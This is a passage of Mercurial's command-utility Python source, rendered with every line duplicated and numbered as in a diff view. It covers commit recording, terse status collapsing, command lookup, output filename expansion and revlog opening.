342 extra={"suffix": ".diff"},
342 extra={"suffix": ".diff"},
343 repopath=repo.path)
343 repopath=repo.path)
344 fp.truncate(0)
344 fp.truncate(0)
345 fp.write(reviewedpatch)
345 fp.write(reviewedpatch)
346 fp.seek(0)
346 fp.seek(0)
347
347
348 [os.unlink(repo.wjoin(c)) for c in newlyaddedandmodifiedfiles]
348 [os.unlink(repo.wjoin(c)) for c in newlyaddedandmodifiedfiles]
349 # 3a. apply filtered patch to clean repo (clean)
349 # 3a. apply filtered patch to clean repo (clean)
350 if backups:
350 if backups:
351 # Equivalent to hg.revert
351 # Equivalent to hg.revert
352 m = scmutil.matchfiles(repo, backups.keys())
352 m = scmutil.matchfiles(repo, backups.keys())
353 mergemod.update(repo, repo.dirstate.p1(),
353 mergemod.update(repo, repo.dirstate.p1(),
354 False, True, matcher=m)
354 False, True, matcher=m)
355
355
356 # 3b. (apply)
356 # 3b. (apply)
357 if dopatch:
357 if dopatch:
358 try:
358 try:
359 ui.debug('applying patch\n')
359 ui.debug('applying patch\n')
360 ui.debug(fp.getvalue())
360 ui.debug(fp.getvalue())
361 patch.internalpatch(ui, repo, fp, 1, eolmode=None)
361 patch.internalpatch(ui, repo, fp, 1, eolmode=None)
362 except patch.PatchError as err:
362 except patch.PatchError as err:
363 raise error.Abort(str(err))
363 raise error.Abort(str(err))
364 del fp
364 del fp
365
365
366 # 4. We prepared working directory according to filtered
366 # 4. We prepared working directory according to filtered
367 # patch. Now is the time to delegate the job to
367 # patch. Now is the time to delegate the job to
368 # commit/qrefresh or the like!
368 # commit/qrefresh or the like!
369
369
370 # Make all of the pathnames absolute.
370 # Make all of the pathnames absolute.
371 newfiles = [repo.wjoin(nf) for nf in newfiles]
371 newfiles = [repo.wjoin(nf) for nf in newfiles]
372 return commitfunc(ui, repo, *newfiles, **opts)
372 return commitfunc(ui, repo, *newfiles, **opts)
373 finally:
373 finally:
374 # 5. finally restore backed-up files
374 # 5. finally restore backed-up files
375 try:
375 try:
376 dirstate = repo.dirstate
376 dirstate = repo.dirstate
377 for realname, tmpname in backups.iteritems():
377 for realname, tmpname in backups.iteritems():
378 ui.debug('restoring %r to %r\n' % (tmpname, realname))
378 ui.debug('restoring %r to %r\n' % (tmpname, realname))
379
379
380 if dirstate[realname] == 'n':
380 if dirstate[realname] == 'n':
381 # without normallookup, restoring timestamp
381 # without normallookup, restoring timestamp
382 # may cause partially committed files
382 # may cause partially committed files
383 # to be treated as unmodified
383 # to be treated as unmodified
384 dirstate.normallookup(realname)
384 dirstate.normallookup(realname)
385
385
386 # copystat=True here and above are a hack to trick any
386 # copystat=True here and above are a hack to trick any
387 # editors that have f open that we haven't modified them.
387 # editors that have f open that we haven't modified them.
388 #
388 #
389 # Also note that this racy as an editor could notice the
389 # Also note that this racy as an editor could notice the
390 # file's mtime before we've finished writing it.
390 # file's mtime before we've finished writing it.
391 util.copyfile(tmpname, repo.wjoin(realname), copystat=True)
391 util.copyfile(tmpname, repo.wjoin(realname), copystat=True)
392 os.unlink(tmpname)
392 os.unlink(tmpname)
393 if tobackup:
393 if tobackup:
394 os.rmdir(backupdir)
394 os.rmdir(backupdir)
395 except OSError:
395 except OSError:
396 pass
396 pass
397
397
398 def recordinwlock(ui, repo, message, match, opts):
398 def recordinwlock(ui, repo, message, match, opts):
399 with repo.wlock():
399 with repo.wlock():
400 return recordfunc(ui, repo, message, match, opts)
400 return recordfunc(ui, repo, message, match, opts)
401
401
402 return commit(ui, repo, recordinwlock, pats, opts)
402 return commit(ui, repo, recordinwlock, pats, opts)
403
403
404 def tersestatus(root, statlist, status, ignorefn, ignore):
404 def tersestatus(root, statlist, status, ignorefn, ignore):
405 """
405 """
406 Returns a list of statuses with directory collapsed if all the files in the
406 Returns a list of statuses with directory collapsed if all the files in the
407 directory has the same status.
407 directory has the same status.
408 """
408 """
409
409
410 def numfiles(dirname):
410 def numfiles(dirname):
411 """
411 """
412 Calculates the number of tracked files in a given directory which also
412 Calculates the number of tracked files in a given directory which also
413 includes files which were removed or deleted. Considers ignored files
413 includes files which were removed or deleted. Considers ignored files
414 if ignore argument is True or 'i' is present in status argument.
414 if ignore argument is True or 'i' is present in status argument.
415 """
415 """
416 if lencache.get(dirname):
416 if lencache.get(dirname):
417 return lencache[dirname]
417 return lencache[dirname]
418 if 'i' in status or ignore:
418 if 'i' in status or ignore:
419 def match(localpath):
419 def match(localpath):
420 absolutepath = os.path.join(root, localpath)
420 absolutepath = os.path.join(root, localpath)
421 if os.path.isdir(absolutepath) and isemptydir(absolutepath):
421 if os.path.isdir(absolutepath) and isemptydir(absolutepath):
422 return True
422 return True
423 return False
423 return False
424 else:
424 else:
425 def match(localpath):
425 def match(localpath):
426 # there can be directory whose all the files are ignored and
426 # there can be directory whose all the files are ignored and
427 # hence the drectory should also be ignored while counting
427 # hence the drectory should also be ignored while counting
428 # number of files or subdirs in it's parent directory. This
428 # number of files or subdirs in it's parent directory. This
429 # checks the same.
429 # checks the same.
430 # XXX: We need a better logic here.
430 # XXX: We need a better logic here.
431 if os.path.isdir(os.path.join(root, localpath)):
431 if os.path.isdir(os.path.join(root, localpath)):
432 return isignoreddir(localpath)
432 return isignoreddir(localpath)
433 else:
433 else:
434 # XXX: there can be files which have the ignored pattern but
434 # XXX: there can be files which have the ignored pattern but
435 # are not ignored. That leads to bug in counting number of
435 # are not ignored. That leads to bug in counting number of
436 # tracked files in the directory.
436 # tracked files in the directory.
437 return ignorefn(localpath)
437 return ignorefn(localpath)
438 lendir = 0
438 lendir = 0
439 abspath = os.path.join(root, dirname)
439 abspath = os.path.join(root, dirname)
440 # There might be cases when a directory does not exists as the whole
440 # There might be cases when a directory does not exists as the whole
441 # directory can be removed and/or deleted.
441 # directory can be removed and/or deleted.
442 try:
442 try:
443 for f in os.listdir(abspath):
443 for f in os.listdir(abspath):
444 localpath = os.path.join(dirname, f)
444 localpath = os.path.join(dirname, f)
445 if not match(localpath):
445 if not match(localpath):
446 lendir += 1
446 lendir += 1
447 except OSError:
447 except OSError:
448 pass
448 pass
449 lendir += len(absentdir.get(dirname, []))
449 lendir += len(absentdir.get(dirname, []))
450 lencache[dirname] = lendir
450 lencache[dirname] = lendir
451 return lendir
451 return lendir
452
452
453 def isemptydir(abspath):
453 def isemptydir(abspath):
454 """
454 """
455 Check whether a directory is empty or not, i.e. there is no files in the
455 Check whether a directory is empty or not, i.e. there is no files in the
456 directory and all its subdirectories.
456 directory and all its subdirectories.
457 """
457 """
458 for f in os.listdir(abspath):
458 for f in os.listdir(abspath):
459 fullpath = os.path.join(abspath, f)
459 fullpath = os.path.join(abspath, f)
460 if os.path.isdir(fullpath):
460 if os.path.isdir(fullpath):
461 # recursion here
461 # recursion here
462 ret = isemptydir(fullpath)
462 ret = isemptydir(fullpath)
463 if not ret:
463 if not ret:
464 return False
464 return False
465 else:
465 else:
466 return False
466 return False
467 return True
467 return True
468
468
469 def isignoreddir(localpath):
469 def isignoreddir(localpath):
470 """Return True if `localpath` directory is ignored or contains only
470 """Return True if `localpath` directory is ignored or contains only
471 ignored files and should hence be considered ignored.
471 ignored files and should hence be considered ignored.
472 """
472 """
473 dirpath = os.path.join(root, localpath)
473 dirpath = os.path.join(root, localpath)
474 if ignorefn(dirpath):
474 if ignorefn(dirpath):
475 return True
475 return True
476 for f in os.listdir(dirpath):
476 for f in os.listdir(dirpath):
477 filepath = os.path.join(dirpath, f)
477 filepath = os.path.join(dirpath, f)
478 if os.path.isdir(filepath):
478 if os.path.isdir(filepath):
479 # recursion here
479 # recursion here
480 ret = isignoreddir(os.path.join(localpath, f))
480 ret = isignoreddir(os.path.join(localpath, f))
481 if not ret:
481 if not ret:
482 return False
482 return False
483 else:
483 else:
484 if not ignorefn(os.path.join(localpath, f)):
484 if not ignorefn(os.path.join(localpath, f)):
485 return False
485 return False
486 return True
486 return True
487
487
488 def absentones(removedfiles, missingfiles):
488 def absentones(removedfiles, missingfiles):
489 """
489 """
490 Returns a dictionary of directories with files in it which are either
490 Returns a dictionary of directories with files in it which are either
491 removed or missing (deleted) in them.
491 removed or missing (deleted) in them.
492 """
492 """
493 absentdir = {}
493 absentdir = {}
494 absentfiles = removedfiles + missingfiles
494 absentfiles = removedfiles + missingfiles
495 while absentfiles:
495 while absentfiles:
496 f = absentfiles.pop()
496 f = absentfiles.pop()
497 par = os.path.dirname(f)
497 par = os.path.dirname(f)
498 if par == '':
498 if par == '':
499 continue
499 continue
500 # we need to store files rather than number of files as some files
500 # we need to store files rather than number of files as some files
501 # or subdirectories in a directory can be counted twice. This is
501 # or subdirectories in a directory can be counted twice. This is
502 # also we have used sets here.
502 # also we have used sets here.
503 try:
503 try:
504 absentdir[par].add(f)
504 absentdir[par].add(f)
505 except KeyError:
505 except KeyError:
506 absentdir[par] = set([f])
506 absentdir[par] = set([f])
507 absentfiles.append(par)
507 absentfiles.append(par)
508 return absentdir
508 return absentdir
509
509
510 indexes = {'m': 0, 'a': 1, 'r': 2, 'd': 3, 'u': 4, 'i': 5, 'c': 6}
510 indexes = {'m': 0, 'a': 1, 'r': 2, 'd': 3, 'u': 4, 'i': 5, 'c': 6}
511 # get a dictonary of directories and files which are missing as os.listdir()
511 # get a dictonary of directories and files which are missing as os.listdir()
512 # won't be able to list them.
512 # won't be able to list them.
513 absentdir = absentones(statlist[2], statlist[3])
513 absentdir = absentones(statlist[2], statlist[3])
514 finalrs = [[]] * len(indexes)
514 finalrs = [[]] * len(indexes)
515 didsomethingchanged = False
515 didsomethingchanged = False
516 # dictionary to store number of files and subdir in a directory so that we
516 # dictionary to store number of files and subdir in a directory so that we
517 # don't compute that again.
517 # don't compute that again.
518 lencache = {}
518 lencache = {}
519
519
520 for st in pycompat.bytestr(status):
520 for st in pycompat.bytestr(status):
521
521
522 try:
522 try:
523 ind = indexes[st]
523 ind = indexes[st]
524 except KeyError:
524 except KeyError:
525 # TODO: Need a better error message here
525 # TODO: Need a better error message here
526 raise error.Abort("'%s' not recognized" % st)
526 raise error.Abort("'%s' not recognized" % st)
527
527
528 sfiles = statlist[ind]
528 sfiles = statlist[ind]
529 if not sfiles:
529 if not sfiles:
530 continue
530 continue
531 pardict = {}
531 pardict = {}
532 for a in sfiles:
532 for a in sfiles:
533 par = os.path.dirname(a)
533 par = os.path.dirname(a)
534 pardict.setdefault(par, []).append(a)
534 pardict.setdefault(par, []).append(a)
535
535
536 rs = []
536 rs = []
537 newls = []
537 newls = []
538 for par, files in pardict.iteritems():
538 for par, files in pardict.iteritems():
539 lenpar = numfiles(par)
539 lenpar = numfiles(par)
540 if lenpar == len(files):
540 if lenpar == len(files):
541 newls.append(par)
541 newls.append(par)
542
542
543 if not newls:
543 if not newls:
544 continue
544 continue
545
545
546 while newls:
546 while newls:
547 newel = newls.pop()
547 newel = newls.pop()
548 if newel == '':
548 if newel == '':
549 continue
549 continue
550 parn = os.path.dirname(newel)
550 parn = os.path.dirname(newel)
551 pardict[newel] = []
551 pardict[newel] = []
552 # Adding pycompat.ossep as newel is a directory.
552 # Adding pycompat.ossep as newel is a directory.
553 pardict.setdefault(parn, []).append(newel + pycompat.ossep)
553 pardict.setdefault(parn, []).append(newel + pycompat.ossep)
554 lenpar = numfiles(parn)
554 lenpar = numfiles(parn)
555 if lenpar == len(pardict[parn]):
555 if lenpar == len(pardict[parn]):
556 newls.append(parn)
556 newls.append(parn)
557
557
558 # dict.values() for Py3 compatibility
558 # dict.values() for Py3 compatibility
559 for files in pardict.values():
559 for files in pardict.values():
560 rs.extend(files)
560 rs.extend(files)
561
561
562 rs.sort()
562 rs.sort()
563 finalrs[ind] = rs
563 finalrs[ind] = rs
564 didsomethingchanged = True
564 didsomethingchanged = True
565
565
566 # If nothing is changed, make sure the order of files is preserved.
566 # If nothing is changed, make sure the order of files is preserved.
567 if not didsomethingchanged:
567 if not didsomethingchanged:
568 return statlist
568 return statlist
569
569
570 for x in xrange(len(indexes)):
570 for x in xrange(len(indexes)):
571 if not finalrs[x]:
571 if not finalrs[x]:
572 finalrs[x] = statlist[x]
572 finalrs[x] = statlist[x]
573
573
574 return finalrs
574 return finalrs
575
575
576 def findpossible(cmd, table, strict=False):
576 def findpossible(cmd, table, strict=False):
577 """
577 """
578 Return cmd -> (aliases, command table entry)
578 Return cmd -> (aliases, command table entry)
579 for each matching command.
579 for each matching command.
580 Return debug commands (or their aliases) only if no normal command matches.
580 Return debug commands (or their aliases) only if no normal command matches.
581 """
581 """
582 choice = {}
582 choice = {}
583 debugchoice = {}
583 debugchoice = {}
584
584
585 if cmd in table:
585 if cmd in table:
586 # short-circuit exact matches, "log" alias beats "^log|history"
586 # short-circuit exact matches, "log" alias beats "^log|history"
587 keys = [cmd]
587 keys = [cmd]
588 else:
588 else:
589 keys = table.keys()
589 keys = table.keys()
590
590
591 allcmds = []
591 allcmds = []
592 for e in keys:
592 for e in keys:
593 aliases = parsealiases(e)
593 aliases = parsealiases(e)
594 allcmds.extend(aliases)
594 allcmds.extend(aliases)
595 found = None
595 found = None
596 if cmd in aliases:
596 if cmd in aliases:
597 found = cmd
597 found = cmd
598 elif not strict:
598 elif not strict:
599 for a in aliases:
599 for a in aliases:
600 if a.startswith(cmd):
600 if a.startswith(cmd):
601 found = a
601 found = a
602 break
602 break
603 if found is not None:
603 if found is not None:
604 if aliases[0].startswith("debug") or found.startswith("debug"):
604 if aliases[0].startswith("debug") or found.startswith("debug"):
605 debugchoice[found] = (aliases, table[e])
605 debugchoice[found] = (aliases, table[e])
606 else:
606 else:
607 choice[found] = (aliases, table[e])
607 choice[found] = (aliases, table[e])
608
608
609 if not choice and debugchoice:
609 if not choice and debugchoice:
610 choice = debugchoice
610 choice = debugchoice
611
611
612 return choice, allcmds
612 return choice, allcmds
613
613
614 def findcmd(cmd, table, strict=True):
614 def findcmd(cmd, table, strict=True):
615 """Return (aliases, command table entry) for command string."""
615 """Return (aliases, command table entry) for command string."""
616 choice, allcmds = findpossible(cmd, table, strict)
616 choice, allcmds = findpossible(cmd, table, strict)
617
617
618 if cmd in choice:
618 if cmd in choice:
619 return choice[cmd]
619 return choice[cmd]
620
620
621 if len(choice) > 1:
621 if len(choice) > 1:
622 clist = sorted(choice)
622 clist = sorted(choice)
623 raise error.AmbiguousCommand(cmd, clist)
623 raise error.AmbiguousCommand(cmd, clist)
624
624
625 if choice:
625 if choice:
626 return list(choice.values())[0]
626 return list(choice.values())[0]
627
627
628 raise error.UnknownCommand(cmd, allcmds)
628 raise error.UnknownCommand(cmd, allcmds)
629
629
630 def findrepo(p):
630 def findrepo(p):
631 while not os.path.isdir(os.path.join(p, ".hg")):
631 while not os.path.isdir(os.path.join(p, ".hg")):
632 oldp, p = p, os.path.dirname(p)
632 oldp, p = p, os.path.dirname(p)
633 if p == oldp:
633 if p == oldp:
634 return None
634 return None
635
635
636 return p
636 return p
637
637
638 def bailifchanged(repo, merge=True, hint=None):
638 def bailifchanged(repo, merge=True, hint=None):
639 """ enforce the precondition that working directory must be clean.
639 """ enforce the precondition that working directory must be clean.
640
640
641 'merge' can be set to false if a pending uncommitted merge should be
641 'merge' can be set to false if a pending uncommitted merge should be
642 ignored (such as when 'update --check' runs).
642 ignored (such as when 'update --check' runs).
643
643
644 'hint' is the usual hint given to Abort exception.
644 'hint' is the usual hint given to Abort exception.
645 """
645 """
646
646
647 if merge and repo.dirstate.p2() != nullid:
647 if merge and repo.dirstate.p2() != nullid:
648 raise error.Abort(_('outstanding uncommitted merge'), hint=hint)
648 raise error.Abort(_('outstanding uncommitted merge'), hint=hint)
649 modified, added, removed, deleted = repo.status()[:4]
649 modified, added, removed, deleted = repo.status()[:4]
650 if modified or added or removed or deleted:
650 if modified or added or removed or deleted:
651 raise error.Abort(_('uncommitted changes'), hint=hint)
651 raise error.Abort(_('uncommitted changes'), hint=hint)
652 ctx = repo[None]
652 ctx = repo[None]
653 for s in sorted(ctx.substate):
653 for s in sorted(ctx.substate):
654 ctx.sub(s).bailifchanged(hint=hint)
654 ctx.sub(s).bailifchanged(hint=hint)
655
655
656 def logmessage(ui, opts):
656 def logmessage(ui, opts):
657 """ get the log message according to -m and -l option """
657 """ get the log message according to -m and -l option """
658 message = opts.get('message')
658 message = opts.get('message')
659 logfile = opts.get('logfile')
659 logfile = opts.get('logfile')
660
660
661 if message and logfile:
661 if message and logfile:
662 raise error.Abort(_('options --message and --logfile are mutually '
662 raise error.Abort(_('options --message and --logfile are mutually '
663 'exclusive'))
663 'exclusive'))
664 if not message and logfile:
664 if not message and logfile:
665 try:
665 try:
666 if isstdiofilename(logfile):
666 if isstdiofilename(logfile):
667 message = ui.fin.read()
667 message = ui.fin.read()
668 else:
668 else:
669 message = '\n'.join(util.readfile(logfile).splitlines())
669 message = '\n'.join(util.readfile(logfile).splitlines())
670 except IOError as inst:
670 except IOError as inst:
671 raise error.Abort(_("can't read commit message '%s': %s") %
671 raise error.Abort(_("can't read commit message '%s': %s") %
672 (logfile, inst.strerror))
672 (logfile, inst.strerror))
673 return message
673 return message
674
674
675 def mergeeditform(ctxorbool, baseformname):
675 def mergeeditform(ctxorbool, baseformname):
676 """return appropriate editform name (referencing a committemplate)
676 """return appropriate editform name (referencing a committemplate)
677
677
678 'ctxorbool' is either a ctx to be committed, or a bool indicating whether
678 'ctxorbool' is either a ctx to be committed, or a bool indicating whether
679 merging is committed.
679 merging is committed.
680
680
681 This returns baseformname with '.merge' appended if it is a merge,
681 This returns baseformname with '.merge' appended if it is a merge,
682 otherwise '.normal' is appended.
682 otherwise '.normal' is appended.
683 """
683 """
684 if isinstance(ctxorbool, bool):
684 if isinstance(ctxorbool, bool):
685 if ctxorbool:
685 if ctxorbool:
686 return baseformname + ".merge"
686 return baseformname + ".merge"
687 elif 1 < len(ctxorbool.parents()):
687 elif 1 < len(ctxorbool.parents()):
688 return baseformname + ".merge"
688 return baseformname + ".merge"
689
689
690 return baseformname + ".normal"
690 return baseformname + ".normal"
691
691
692 def getcommiteditor(edit=False, finishdesc=None, extramsg=None,
692 def getcommiteditor(edit=False, finishdesc=None, extramsg=None,
693 editform='', **opts):
693 editform='', **opts):
694 """get appropriate commit message editor according to '--edit' option
694 """get appropriate commit message editor according to '--edit' option
695
695
696 'finishdesc' is a function to be called with edited commit message
696 'finishdesc' is a function to be called with edited commit message
697 (= 'description' of the new changeset) just after editing, but
697 (= 'description' of the new changeset) just after editing, but
698 before checking empty-ness. It should return actual text to be
698 before checking empty-ness. It should return actual text to be
699 stored into history. This allows to change description before
699 stored into history. This allows to change description before
700 storing.
700 storing.
701
701
702 'extramsg' is a extra message to be shown in the editor instead of
702 'extramsg' is a extra message to be shown in the editor instead of
703 'Leave message empty to abort commit' line. 'HG: ' prefix and EOL
703 'Leave message empty to abort commit' line. 'HG: ' prefix and EOL
704 is automatically added.
704 is automatically added.
705
705
706 'editform' is a dot-separated list of names, to distinguish
706 'editform' is a dot-separated list of names, to distinguish
707 the purpose of commit text editing.
707 the purpose of commit text editing.
708
708
709 'getcommiteditor' returns 'commitforceeditor' regardless of
709 'getcommiteditor' returns 'commitforceeditor' regardless of
710 'edit', if one of 'finishdesc' or 'extramsg' is specified, because
710 'edit', if one of 'finishdesc' or 'extramsg' is specified, because
711 they are specific for usage in MQ.
711 they are specific for usage in MQ.
712 """
712 """
713 if edit or finishdesc or extramsg:
713 if edit or finishdesc or extramsg:
714 return lambda r, c, s: commitforceeditor(r, c, s,
714 return lambda r, c, s: commitforceeditor(r, c, s,
715 finishdesc=finishdesc,
715 finishdesc=finishdesc,
716 extramsg=extramsg,
716 extramsg=extramsg,
717 editform=editform)
717 editform=editform)
718 elif editform:
718 elif editform:
719 return lambda r, c, s: commiteditor(r, c, s, editform=editform)
719 return lambda r, c, s: commiteditor(r, c, s, editform=editform)
720 else:
720 else:
721 return commiteditor
721 return commiteditor
722
722
723 def loglimit(opts):
723 def loglimit(opts):
724 """get the log limit according to option -l/--limit"""
724 """get the log limit according to option -l/--limit"""
725 limit = opts.get('limit')
725 limit = opts.get('limit')
726 if limit:
726 if limit:
727 try:
727 try:
728 limit = int(limit)
728 limit = int(limit)
729 except ValueError:
729 except ValueError:
730 raise error.Abort(_('limit must be a positive integer'))
730 raise error.Abort(_('limit must be a positive integer'))
731 if limit <= 0:
731 if limit <= 0:
732 raise error.Abort(_('limit must be positive'))
732 raise error.Abort(_('limit must be positive'))
733 else:
733 else:
734 limit = None
734 limit = None
735 return limit
735 return limit
736
736
737 def makefilename(repo, pat, node, desc=None,
737 def makefilename(repo, pat, node, desc=None,
738 total=None, seqno=None, revwidth=None, pathname=None):
738 total=None, seqno=None, revwidth=None, pathname=None):
739 node_expander = {
739 node_expander = {
740 'H': lambda: hex(node),
740 'H': lambda: hex(node),
741 'R': lambda: str(repo.changelog.rev(node)),
741 'R': lambda: str(repo.changelog.rev(node)),
742 'h': lambda: short(node),
742 'h': lambda: short(node),
743 'm': lambda: re.sub('[^\w]', '_', str(desc))
743 'm': lambda: re.sub('[^\w]', '_', str(desc))
744 }
744 }
745 expander = {
745 expander = {
746 '%': lambda: '%',
746 '%': lambda: '%',
747 'b': lambda: os.path.basename(repo.root),
747 'b': lambda: os.path.basename(repo.root),
748 }
748 }
749
749
750 try:
750 try:
751 if node:
751 if node:
752 expander.update(node_expander)
752 expander.update(node_expander)
753 if node:
753 if node:
754 expander['r'] = (lambda:
754 expander['r'] = (lambda:
755 str(repo.changelog.rev(node)).zfill(revwidth or 0))
755 str(repo.changelog.rev(node)).zfill(revwidth or 0))
756 if total is not None:
756 if total is not None:
757 expander['N'] = lambda: str(total)
757 expander['N'] = lambda: str(total)
758 if seqno is not None:
758 if seqno is not None:
759 expander['n'] = lambda: str(seqno)
759 expander['n'] = lambda: str(seqno)
760 if total is not None and seqno is not None:
760 if total is not None and seqno is not None:
761 expander['n'] = lambda: str(seqno).zfill(len(str(total)))
761 expander['n'] = lambda: str(seqno).zfill(len(str(total)))
762 if pathname is not None:
762 if pathname is not None:
763 expander['s'] = lambda: os.path.basename(pathname)
763 expander['s'] = lambda: os.path.basename(pathname)
764 expander['d'] = lambda: os.path.dirname(pathname) or '.'
764 expander['d'] = lambda: os.path.dirname(pathname) or '.'
765 expander['p'] = lambda: pathname
765 expander['p'] = lambda: pathname
766
766
767 newname = []
767 newname = []
768 patlen = len(pat)
768 patlen = len(pat)
769 i = 0
769 i = 0
770 while i < patlen:
770 while i < patlen:
771 c = pat[i:i + 1]
771 c = pat[i:i + 1]
772 if c == '%':
772 if c == '%':
773 i += 1
773 i += 1
774 c = pat[i:i + 1]
774 c = pat[i:i + 1]
775 c = expander[c]()
775 c = expander[c]()
776 newname.append(c)
776 newname.append(c)
777 i += 1
777 i += 1
778 return ''.join(newname)
778 return ''.join(newname)
779 except KeyError as inst:
779 except KeyError as inst:
780 raise error.Abort(_("invalid format spec '%%%s' in output filename") %
780 raise error.Abort(_("invalid format spec '%%%s' in output filename") %
781 inst.args[0])
781 inst.args[0])
782
782
783 def isstdiofilename(pat):
783 def isstdiofilename(pat):
784 """True if the given pat looks like a filename denoting stdin/stdout"""
784 """True if the given pat looks like a filename denoting stdin/stdout"""
785 return not pat or pat == '-'
785 return not pat or pat == '-'
786
786
787 class _unclosablefile(object):
787 class _unclosablefile(object):
788 def __init__(self, fp):
788 def __init__(self, fp):
789 self._fp = fp
789 self._fp = fp
790
790
791 def close(self):
791 def close(self):
792 pass
792 pass
793
793
794 def __iter__(self):
794 def __iter__(self):
795 return iter(self._fp)
795 return iter(self._fp)
796
796
797 def __getattr__(self, attr):
797 def __getattr__(self, attr):
798 return getattr(self._fp, attr)
798 return getattr(self._fp, attr)
799
799
800 def __enter__(self):
800 def __enter__(self):
801 return self
801 return self
802
802
803 def __exit__(self, exc_type, exc_value, exc_tb):
803 def __exit__(self, exc_type, exc_value, exc_tb):
804 pass
804 pass
805
805
806 def makefileobj(repo, pat, node=None, desc=None, total=None,
806 def makefileobj(repo, pat, node=None, desc=None, total=None,
807 seqno=None, revwidth=None, mode='wb', modemap=None,
807 seqno=None, revwidth=None, mode='wb', modemap=None,
808 pathname=None):
808 pathname=None):
809
809
810 writable = mode not in ('r', 'rb')
810 writable = mode not in ('r', 'rb')
811
811
812 if isstdiofilename(pat):
812 if isstdiofilename(pat):
813 if writable:
813 if writable:
814 fp = repo.ui.fout
814 fp = repo.ui.fout
815 else:
815 else:
816 fp = repo.ui.fin
816 fp = repo.ui.fin
817 return _unclosablefile(fp)
817 return _unclosablefile(fp)
818 fn = makefilename(repo, pat, node, desc, total, seqno, revwidth, pathname)
818 fn = makefilename(repo, pat, node, desc, total, seqno, revwidth, pathname)
819 if modemap is not None:
819 if modemap is not None:
820 mode = modemap.get(fn, mode)
820 mode = modemap.get(fn, mode)
821 if mode == 'wb':
821 if mode == 'wb':
822 modemap[fn] = 'ab'
822 modemap[fn] = 'ab'
823 return open(fn, mode)
823 return open(fn, mode)
824
824
825 def openrevlog(repo, cmd, file_, opts):
825 def openrevlog(repo, cmd, file_, opts):
826 """opens the changelog, manifest, a filelog or a given revlog"""
826 """opens the changelog, manifest, a filelog or a given revlog"""
827 cl = opts['changelog']
827 cl = opts['changelog']
828 mf = opts['manifest']
828 mf = opts['manifest']
829 dir = opts['dir']
829 dir = opts['dir']
830 msg = None
830 msg = None
831 if cl and mf:
831 if cl and mf:
832 msg = _('cannot specify --changelog and --manifest at the same time')
832 msg = _('cannot specify --changelog and --manifest at the same time')
833 elif cl and dir:
833 elif cl and dir:
834 msg = _('cannot specify --changelog and --dir at the same time')
834 msg = _('cannot specify --changelog and --dir at the same time')
835 elif cl or mf or dir:
835 elif cl or mf or dir:
836 if file_:
836 if file_:
837 msg = _('cannot specify filename with --changelog or --manifest')
837 msg = _('cannot specify filename with --changelog or --manifest')
838 elif not repo:
838 elif not repo:
839 msg = _('cannot specify --changelog or --manifest or --dir '
839 msg = _('cannot specify --changelog or --manifest or --dir '
840 'without a repository')
840 'without a repository')
841 if msg:
841 if msg:
842 raise error.Abort(msg)
842 raise error.Abort(msg)
843
843
844 r = None
844 r = None
845 if repo:
845 if repo:
846 if cl:
846 if cl:
847 r = repo.unfiltered().changelog
847 r = repo.unfiltered().changelog
848 elif dir:
848 elif dir:
849 if 'treemanifest' not in repo.requirements:
849 if 'treemanifest' not in repo.requirements:
850 raise error.Abort(_("--dir can only be used on repos with "
850 raise error.Abort(_("--dir can only be used on repos with "
851 "treemanifest enabled"))
851 "treemanifest enabled"))
852 dirlog = repo.manifestlog._revlog.dirlog(dir)
852 dirlog = repo.manifestlog._revlog.dirlog(dir)
853 if len(dirlog):
853 if len(dirlog):
854 r = dirlog
854 r = dirlog
855 elif mf:
855 elif mf:
856 r = repo.manifestlog._revlog
856 r = repo.manifestlog._revlog
857 elif file_:
857 elif file_:
858 filelog = repo.file(file_)
858 filelog = repo.file(file_)
859 if len(filelog):
859 if len(filelog):
860 r = filelog
860 r = filelog
861 if not r:
861 if not r:
862 if not file_:
862 if not file_:
863 raise error.CommandError(cmd, _('invalid arguments'))
863 raise error.CommandError(cmd, _('invalid arguments'))
864 if not os.path.isfile(file_):
864 if not os.path.isfile(file_):
865 raise error.Abort(_("revlog '%s' not found") % file_)
865 raise error.Abort(_("revlog '%s' not found") % file_)
866 r = revlog.revlog(vfsmod.vfs(pycompat.getcwd(), audit=False),
866 r = revlog.revlog(vfsmod.vfs(pycompat.getcwd(), audit=False),
867 file_[:-2] + ".i")
867 file_[:-2] + ".i")
868 return r
868 return r
869
869
870 def copy(ui, repo, pats, opts, rename=False):
870 def copy(ui, repo, pats, opts, rename=False):
871 # called with the repo lock held
871 # called with the repo lock held
872 #
872 #
873 # hgsep => pathname that uses "/" to separate directories
873 # hgsep => pathname that uses "/" to separate directories
874 # ossep => pathname that uses os.sep to separate directories
874 # ossep => pathname that uses os.sep to separate directories
875 cwd = repo.getcwd()
875 cwd = repo.getcwd()
876 targets = {}
876 targets = {}
877 after = opts.get("after")
877 after = opts.get("after")
878 dryrun = opts.get("dry_run")
878 dryrun = opts.get("dry_run")
879 wctx = repo[None]
879 wctx = repo[None]
880
880
881 def walkpat(pat):
881 def walkpat(pat):
882 srcs = []
882 srcs = []
883 if after:
883 if after:
884 badstates = '?'
884 badstates = '?'
885 else:
885 else:
886 badstates = '?r'
886 badstates = '?r'
887 m = scmutil.match(wctx, [pat], opts, globbed=True)
887 m = scmutil.match(wctx, [pat], opts, globbed=True)
888 for abs in wctx.walk(m):
888 for abs in wctx.walk(m):
889 state = repo.dirstate[abs]
889 state = repo.dirstate[abs]
890 rel = m.rel(abs)
890 rel = m.rel(abs)
891 exact = m.exact(abs)
891 exact = m.exact(abs)
892 if state in badstates:
892 if state in badstates:
893 if exact and state == '?':
893 if exact and state == '?':
894 ui.warn(_('%s: not copying - file is not managed\n') % rel)
894 ui.warn(_('%s: not copying - file is not managed\n') % rel)
895 if exact and state == 'r':
895 if exact and state == 'r':
896 ui.warn(_('%s: not copying - file has been marked for'
896 ui.warn(_('%s: not copying - file has been marked for'
897 ' remove\n') % rel)
897 ' remove\n') % rel)
898 continue
898 continue
899 # abs: hgsep
899 # abs: hgsep
900 # rel: ossep
900 # rel: ossep
901 srcs.append((abs, rel, exact))
901 srcs.append((abs, rel, exact))
902 return srcs
902 return srcs
903
903
904 # abssrc: hgsep
904 # abssrc: hgsep
905 # relsrc: ossep
905 # relsrc: ossep
906 # otarget: ossep
906 # otarget: ossep
907 def copyfile(abssrc, relsrc, otarget, exact):
907 def copyfile(abssrc, relsrc, otarget, exact):
908 abstarget = pathutil.canonpath(repo.root, cwd, otarget)
908 abstarget = pathutil.canonpath(repo.root, cwd, otarget)
909 if '/' in abstarget:
909 if '/' in abstarget:
910 # We cannot normalize abstarget itself, this would prevent
910 # We cannot normalize abstarget itself, this would prevent
